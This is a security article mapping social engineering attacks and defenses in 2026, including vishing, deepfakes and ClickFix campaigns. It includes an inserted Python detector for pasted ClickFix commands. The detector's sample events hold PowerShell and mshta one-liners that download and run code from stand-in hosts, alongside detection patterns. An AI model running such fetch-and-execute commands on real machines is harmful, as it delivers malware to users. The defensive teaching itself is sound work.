Social Engineering 2026: A Complete Map of Attack and Defense Methods

Posted by WILD (Administrator, Staff member)
For the first time, voice phishing has overtaken email as the leading initial access vector. According to Mandiant M-Trends 2026, classic phishing email accounts for only 6% of confirmed initial-access cases, while vishing has risen to 11% (23% in cloud incidents). On average, 22 seconds elapse between the first call and the hand-off of the obtained access to the next operator group. Not minutes. Twenty-two seconds, and one conversation becomes a full-blown incident.

This article serves as a navigation hub for the entire topic of social engineering: from classic methods to techniques that have only become commonplace in the last year. Each section is an entry point from which to delve into a more detailed analysis.
What is social engineering and why will it dominate in 2026?
Social engineering does not hack a system; it hacks a person. The attacker is not looking for a vulnerability in code. They are looking for the moment when an employee makes a bad decision: resetting a password over the phone, sending a document in response to a manager's "urgent" request, or pasting a command into a terminal because a web page told them to.

In MITRE ATT&CK, social engineering encompasses a whole cluster of techniques: from Phishing (T1566) and its subtechniques—Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002), Spearphishing via Service (T1566.003), and Spearphishing Voice (T1566.004)—to Phishing for Information (T1598) during the reconnaissance phase, Impersonation (T1656) to bypass security measures, and User Execution (T1204), when the victim executes malicious code.

Why do social engineering techniques work? According to Unit 42, 36% of all incidents it investigated in 2025 began with social engineering. Firewalls, EDR and SIEM are stronger than ever, but attackers do not need to defeat them: a call to the help desk while posing as an employee is enough. Scattered Spider (UNC3944), per the same M-Trends 2026 data, reached domain administrator in under 40 minutes after a single call to IT support, without launching any malware.

The human factor is the weak link not because people are stupid, but because attacks fit into normal workflows: password resets, payment approvals, software updates. Every action looks routine, and each can become the point of compromise.

A detailed analysis of fundamental methods and protection: Social Engineering: Attack Methods and Practical Defense
10 Types of Social Engineering: A Complete Classification of Attacks on Humans
The types of social engineering have long since moved beyond the "Nigerian prince" letters. Here is a systematic map of the methods relevant in 2026:
Each of these methods represents a distinct area of expertise. Below, I'll discuss the key areas, and for a deeper dive into specific techniques, use the navigation bar at the beginning of the article.
Phishing, Vishing, and Smishing: The Classic Triad Gains Voice
Phishing attacks keep changing in 2026. The Anti-Phishing Working Group recorded 1,130,393 phishing attacks in the second quarter of 2025, a 13% increase over the previous quarter. Cofense reported that in 2024 its phishing detection platform observed a malicious email every 42 seconds on average.

But the main change is not the number of emails; it is the change of channel. Vishing, voice phishing, has become the dominant vector for the first time. Attackers call the help desk, pose as an employee, and ask to re-enroll an MFA device or unlock an account. The conversation lasts three to five minutes. No malware, no suspicious attachments, just a voice and a convincing cover story.

Smishing is developing in parallel. Employees receive SMS messages purportedly from a courier service, a bank, or a corporate system. The link leads to a cloned login portal. Filtering on mobile devices is significantly weaker than in corporate email, and users react faster: according to the Verizon DBIR, the median time to click a phishing link after opening the email is 21 seconds. Twenty-one seconds, and the account is no longer yours.

Recognition checklist (post next to the monitor):

- Incoming call requesting a password or MFA reset: hang up and call back on the number in the corporate directory, never on a number the caller provides. If you are the help desk, you verify the caller; the caller does not verify you.
- SMS with a link from a "bank" or "delivery service": open the service from a bookmark or by typing the address, not from the link in the message.
- Email with an attachment from a familiar sender but in an unusual style: confirm through a second channel (a call or a message in a separate app) before opening it.
- Any request for confidential data delivered with a sense of urgency: a verification pause is mandatory. Urgency is the attacker's tool for suppressing that pause.

In Russia, according to Solar 4RAYS, dozens of organizations received emails in 2025 imitating notifications from the Federal Bailiff Service, with the DarkWatchman RAT attached. A classic example: fear of the authorities works flawlessly.
Pretexting and impersonation: why employees trust callers
Pretexting is the art of building a cover story (a "legend"). Unlike mass phishing, the attacker prepares in advance a story that will seem plausible to a specific victim, researching the company structure on LinkedIn and hh.ru to learn the names of executives, project titles, and internal terminology.

In my experience conducting Red Team operations, the most effective pretexts were built on three elements: knowledge of the company's inner workings, the right tone of communication, and exploitation of the hierarchy. In Russian organizations, the last factor is devastating. The habit of following orders from "higher-ups" without question makes BEC (Business Email Compromise) attacks devastatingly effective.

According to the FBI IC3, cumulative losses from BEC attacks from 2013 to 2023 exceeded $55.4 billion globally. In 2024 alone, IC3 received 21,442 BEC complaints with losses exceeding $2.7 billion.

Impersonation as a technique (MITRE ATT&CK T1656) has expanded far beyond email. Attackers create cloned Telegram and WhatsApp accounts, spoof phone numbers via VoIP, and now generate a manager's voice with AI. A typical Russian scenario: an accountant receives a message from the "CEO" in a messenger requesting urgent payment of an invoice. The profile picture matches, the communication style is believable, and the note "Don't call, I'm in a meeting" blocks verification. It would be beautiful, if it weren't so sad.

If you are an accountant or a finance professional, there is only one rule: any transfer request above a set amount is confirmed by calling the requester back on a phone number taken from the corporate directory. Not from the message, not from an email signature, from the directory.
Deepfake and Generative AI: Deception Has Gone Industrial
Psychological manipulation in cybersecurity has reached a new level with the advent of accessible generative AI tools. The number of publicly available deepfake files has grown from 500,000 in 2023 to more than 8 million in 2025. This is not a laboratory threat; it is a conveyor belt of deception.
Documented real-world cases:

Hong Kong, January 2025: Fraudsters cloned a financial manager's voice for a WhatsApp call. The victim transferred approximately 145 million Hong Kong dollars (~18.5 million USD) to fictitious crypto accounts. A single call.
CFO fraud via video call: Employees of a multinational company participated in a video conference where all participants, except the victim, were deepfake generations. Losses: $25.6 million (according to CNN). Imagine: you're at a meeting, everyone's a familiar face, everyone's a familiar voice—and it's all fake.
Voice biometrics bypass: Deepfake audio was used to bypass voice authentication in banking systems, enabling unauthorized transactions worth tens of millions.

The democratization of tools like ElevenLabs makes voice cloning accessible to anyone with a 30-second snippet of the victim's speech—a public speech, a podcast, or a LinkedIn video is enough.

But there is no reason to panic about AI specifically. Mandiant's M-Trends 2026 is blunt: 2025 was not the year breaches happened because of AI. The vast majority of successful intrusions still come down to mundane failures: weak identity verification, excessive privileges, and inconsistent MFA enforcement. AI makes social engineering faster and more convincing, but the weaknesses it exploits predate it.

A detailed analysis of deepfake attacks on identity systems: Bypassing KYC verification: deepfakes, injections, and social engineering in attacks on identity systems
ClickFix campaigns: 517% growth and the user as an execution engine
One of the most alarming trends of 2025-2026 is the ClickFix attack. According to Cloud Range, their volume grew by 517% in 2025. These campaigns use no malicious attachments and exploit no software vulnerability. They exploit the user's trust in the browser and in what a web page tells them to do.

ClickFix attack scenario:

1. The user searches for something ordinary: "Zoom installer", "Outlook login".
2. A paid ad or a poisoned search result leads to a clone of the legitimate website.
3. The website displays a warning ("Suspicious activity detected") or a fake CAPTCHA. The page's script has already placed a command in the clipboard.
4. The user is told to "fix the problem" by pressing Win+R (or opening a terminal), pasting, and pressing Enter.
5. The pasted command is typically a PowerShell or mshta one-liner that downloads and runs the next stage, an infostealer or a RAT.

Key feature: the user initiates code execution (MITRE ATT&CK T1204, User Execution). Endpoint protection and web filters may not fire because the landing page carries no malicious file, and the download and execution come from a legitimate, user-launched interpreter (powershell.exe, mshta.exe) rather than from an attachment. Essentially, the browser has replaced the inbox as the most exploited entry point.

Protection: do not rely on the execution policy. Set-ExecutionPolicy Restricted only blocks .ps1 files; it does nothing against the inline -Command / -EncodedCommand one-liners ClickFix uses, and the attacker's own command can simply add -ExecutionPolicy Bypass. What actually helps: remove the Run dialog for standard users via GPO ("Remove Run menu from Start Menu"), restrict powershell.exe, mshta.exe, wscript.exe and cscript.exe for non-administrators with AppLocker or WDAC, put PowerShell into Constrained Language Mode, and enable Script Block Logging (Event ID 4104) plus process creation logging with command lines (Event ID 4688 or Sysmon Event 1) so that a pasted command is visible to the SOC. And, even more importantly, drill this into everyone's head: no legitimate service will ever ask you to copy a command into a terminal. Never. If it does, it is an attack.
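To turn the "user as execution engine" point into something a SOC can actually detect, here is an added example that is not code from the original post: a scorer that runs over constructed process-creation events in the style of Sysmon Event ID 1 (JSON lines, as Winlogbeat-style shippers emit them) and flags interpreter launches with the parent-process and command-line combination typical of a pasted ClickFix command. The Sysmon field names are real; the hosts, users, URLs, indicator weights and threshold are assumptions for illustration and should be tuned against your own baseline.

```python
"""Flag ClickFix-style user-initiated execution in process-creation telemetry.

Added example, not code from the original post. The records below are
constructed to imitate Sysmon Event ID 1 (process creation) exported as JSON
lines; field names follow Sysmon (Image, ParentImage, CommandLine, User),
while hostnames, users and URLs are invented.
"""
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Interpreters a ClickFix lure tells the victim to paste the command into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Win+R (Run dialog) and Start-menu launches are children of explorer.exe, which is
# exactly the parent you get when a user pastes a command as instructed.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Fragments typical of ClickFix one-liners. Each hit adds its weight; none is
# malicious on its own (admins use -nop, iwr and -ExecutionPolicy Bypass too).
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", 3, "hidden window"),
    (r"\b(?:iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", 2, "download cradle"),
    (r"mshta\S*\s+\S*https?://", 4, "mshta remote hta"),
    (r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 3, "encoded command"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 2, "execution policy bypass"),
    (r"#.*(?:not a robot|captcha|verification id)", 4, "fake captcha trailer"),
]
FLAG_THRESHOLD = 5  # assumed value; tune on your own environment's baseline


@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: List[str] = field(default_factory=list)
    command_line: str = ""


def basename(path: str) -> str:
    """Last path component, lower-cased, for both Windows and POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Finding]:
    """Return a Finding when the event looks like a pasted ClickFix command, else None."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image not in INTERPRETERS:
        return None
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"{image} spawned by {parent} (Run dialog / Start menu)")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            score += weight
            reasons.append(label)
    if score < FLAG_THRESHOLD:
        return None
    return Finding(ev.get("Computer", "?"), ev.get("User", "?"), score, reasons, cmd)


def scan(lines) -> List[Finding]:
    """Score every JSON-line event and return the ones over the threshold."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            hit = score_event(json.loads(line))
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry: two ClickFix launches and three benign interpreter starts.
SAMPLE_EVENTS = r"""
{"Computer": "WS-0412", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iwr https://captcha-check.invalid/v.txt | iex\" # \"I am not a robot - reCAPTCHA Verification ID: 8421\""}
{"Computer": "WS-0419", "User": "CORP\\asmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://fix-zoom.invalid/fix.hta"}
{"Computer": "WS-0101", "User": "CORP\\itadmin", "ParentImage": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal\\WindowsTerminal.exe", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -NoProfile -Command \"Get-Service -Name Spooler\""}
{"Computer": "WS-0412", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell"}
{"Computer": "WS-0220", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Windows\\CCM\\inventory.ps1"}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS.splitlines()):
        print(f"[{f.score}] {f.host} {f.user}: {', '.join(f.reasons)}\n    {f.command_line}")
```

On the constructed data only the two pasted commands are flagged: the fake-CAPTCHA PowerShell one-liner scores 14 and the mshta launch scores 6, while an admin's pwsh session in Windows Terminal, a bare powershell.exe opened from the Start menu, and a management agent running a script with -ExecutionPolicy Bypass all stay under the threshold. The parent-process condition is what separates a ClickFix paste from legitimate automation; the command-line indicators alone would drown the SOC in admin activity, which is also why -ExecutionPolicy Bypass is a low-weight signal and not a blocking control.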
Multi-channel attacks and phishing via messaging apps
Social engineering in 2026 isn't a single channel. It's an orchestrated sequence of touchpoints across email, SMS, voice, messaging apps, and corporate platforms. A multi-channel approach builds the victim's trust at every stage.

A typical multi-channel attack unfolds in three stages:

Stage 1 - Initial contact via a trusted channel. A message in Slack or Teams from a "colleague" mentioning a real project. No links, no attachments - just context. Warming up.

Stage 2 - Follow-up via a second channel. A few minutes later, an email or call arrives referencing the first message. Cross-channel confirmation breaks skepticism. "Well, if it's in email and Slack, then it's real."

Stage 3 – credential collection or action. A link to a "corporate portal," a PDF invoice in a workspace, or a request to confirm identity. By this point, the victim has already "approved" the context through several points of contact.

In Russia, attacks via Telegram and WhatsApp are a distinct threat. Compromising a messenger account and then messaging the victim's contacts is a common scenario. But APT groups operate more subtly: they use QR-code phishing to link an attacker-controlled device to the account, gaining persistent access to correspondence without ever touching the password. Silent, clean, and without a trace.

A detailed look at APT group techniques in messaging apps: Phishing via messaging apps: How APT groups attack Telegram and Signal and what to do about it

Technical analysis of QR phishing in Signal: Hacking a Signal account via linked devices: Technical analysis of QR phishing by Russian APT groups
Attacks on IT support: 40 minutes to reach a domain admin without a single exploit

A separate category, rarely covered by Russian-language sources, is targeted social engineering of internal IT processes. This is not phishing in the traditional sense. It is the exploitation of support procedures themselves: the help desk's password-reset and MFA-reset workflows become the attack surface.